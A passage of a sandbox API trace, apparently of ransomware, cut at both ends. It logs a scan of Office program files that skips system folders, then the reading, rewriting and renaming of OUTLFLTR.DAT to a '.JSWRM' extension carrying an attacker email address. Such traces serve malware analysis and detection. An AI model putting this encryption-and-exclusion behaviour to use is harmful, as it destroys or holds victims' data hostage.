lpUsedDefaultChar=0x0) returned 7 [0137.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSF.DLL", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSF.DLL", lpUsedDefaultChar=0x0) returned 7 [0137.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSF.DLL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0137.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSF.DLL", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSF.DLL", lpUsedDefaultChar=0x0) returned 7 [0137.669] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd29ce0e8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd29ce0e8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2b4b84a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa060, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OSFPROXY.DLL", cAlternateFileName="")) returned 1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2=".") returned 1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="..") returned 1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="...") returned 1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="windows") returned -1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="recovery") returned -1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="perflogs") returned -1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="documents and settings") returned 1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="system volume information") returned -1 [0137.669] lstrcmpiW (lpString1="OSFPROXY.DLL", lpString2="msocache") returned 1 [0137.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFPROXY.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFPROXY.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSFPROXY.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFPROXY.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFPROXY.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSFPROXY.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.669] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa060, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OSFROAMINGPROXY.DLL", cAlternateFileName="OSFROA~1.DLL")) returned 1 [0137.669] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2=".") returned 1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="..") returned 1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="...") returned 1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="windows") returned -1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="recovery") returned -1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="perflogs") returned -1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="documents and settings") returned 1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="system volume information") returned -1 [0137.670] lstrcmpiW (lpString1="OSFROAMINGPROXY.DLL", lpString2="msocache") returned 1 [0137.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFROAMINGPROXY.DLL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFROAMINGPROXY.DLL", cchWideChar=19, lpMultiByteStr=0x240ef8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSFROAMINGPROXY.DLL", lpUsedDefaultChar=0x0) returned 19 [0137.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFROAMINGPROXY.DLL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFROAMINGPROXY.DLL", cchWideChar=19, lpMultiByteStr=0x241010, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSFROAMINGPROXY.DLL", lpUsedDefaultChar=0x0) returned 19 [0137.670] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c8ab024, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x308c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OSFSHARED.DLL", cAlternateFileName="OSFSHA~1.DLL")) returned 1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2=".") returned 1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="..") returned 1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="...") returned 1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="windows") returned -1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="recovery") returned -1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="perflogs") returned -1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="documents and settings") returned 1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="system volume information") returned -1 [0137.670] lstrcmpiW (lpString1="OSFSHARED.DLL", lpString2="msocache") returned 1 [0137.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFSHARED.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFSHARED.DLL", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSFSHARED.DLL", lpUsedDefaultChar=0x0) returned 13 [0137.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFSHARED.DLL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0137.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFSHARED.DLL", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSFSHARED.DLL", lpUsedDefaultChar=0x0) returned 13 [0137.670] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c8ab024, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x77060, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OSFUI.DLL", cAlternateFileName="")) returned 1 [0137.670] lstrcmpiW (lpString1="OSFUI.DLL", lpString2=".") returned 1 [0137.670] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="..") returned 1 [0137.670] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="...") returned 1 [0137.671] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="windows") returned -1 [0137.671] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="recovery") returned -1 [0137.671] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="perflogs") returned -1 [0137.671] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="documents and settings") returned 1 [0137.671] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.671] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="system volume information") returned -1 [0137.671] lstrcmpiW (lpString1="OSFUI.DLL", lpString2="msocache") returned 1 [0137.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFUI.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFUI.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSFUI.DLL", lpUsedDefaultChar=0x0) returned 9 [0137.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFUI.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSFUI.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSFUI.DLL", lpUsedDefaultChar=0x0) returned 9 [0137.671] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca57b43c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca57b43c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca5a1676, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2c4a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLCTL.DLL", cAlternateFileName="")) returned 1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2=".") returned 1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="..") returned 1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="...") returned 1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="windows") returned -1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="recovery") returned -1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="perflogs") returned -1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="documents and settings") returned 1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="system volume information") returned -1 [0137.671] lstrcmpiW (lpString1="OUTLCTL.DLL", lpString2="msocache") returned 1 [0137.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLCTL.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLCTL.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLCTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLCTL.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLCTL.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLCTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.671] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x380000, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLFLTR.DAT", cAlternateFileName="")) returned 1 [0137.671] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2=".") returned 1 [0137.671] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="..") returned 1 [0137.671] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="...") returned 1 [0137.672] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="windows") returned -1 [0137.672] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="recovery") returned -1 [0137.672] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="perflogs") returned -1 [0137.672] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="documents and settings") returned 1 [0137.672] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="$RECYCLE.BIN") returned 1 [0137.672] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="system volume information") returned -1 [0137.672] lstrcmpiW (lpString1="OUTLFLTR.DAT", lpString2="msocache") returned 1 [0137.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLFLTR.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLFLTR.DAT", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLFLTR.DAT", lpUsedDefaultChar=0x0) returned 12 [0137.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLFLTR.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLFLTR.DAT", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLFLTR.DAT", lpUsedDefaultChar=0x0) returned 12 [0137.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLFLTR.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlfltr.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.673] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3670016) returned 1 [0137.673] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.674] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.689] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.689] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.689] CloseHandle (hObject=0x45c) returned 1 [0137.689] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLFLTR.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlfltr.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLFLTR.DAT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlfltr.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.691] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xab940, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLFLTR.DLL", cAlternateFileName="")) returned 1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2=".") returned 1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="..") returned 1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="...") returned 1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="windows") returned -1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="recovery") returned -1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="perflogs") returned -1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="documents and settings") returned 1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="system volume information") returned -1 [0137.691] lstrcmpiW (lpString1="OUTLFLTR.DLL", lpString2="msocache") returned 1 [0137.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLFLTR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLFLTR.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLFLTR.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLFLTR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLFLTR.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLFLTR.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.691] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c943977, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbce68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLMIME.DLL", cAlternateFileName="")) returned 1 [0137.691] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2=".") returned 1 [0137.691] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="..") returned 1 [0137.691] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="...") returned 1 [0137.691] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="windows") returned -1 [0137.691] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="recovery") returned -1 [0137.691] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="perflogs") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="documents and settings") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="system volume information") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLMIME.DLL", lpString2="msocache") returned 1 [0137.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLMIME.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLMIME.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLMIME.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLMIME.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLMIME.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLMIME.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.692] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca57b43c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xda982389, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x212b448, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OUTLOOK.EXE", cAlternateFileName="")) returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2=".") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="..") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="...") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="windows") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="recovery") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="perflogs") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="documents and settings") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="system volume information") returned -1 [0137.692] lstrcmpiW (lpString1="OUTLOOK.EXE", lpString2="msocache") returned 1 [0137.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.EXE", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK.EXE", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 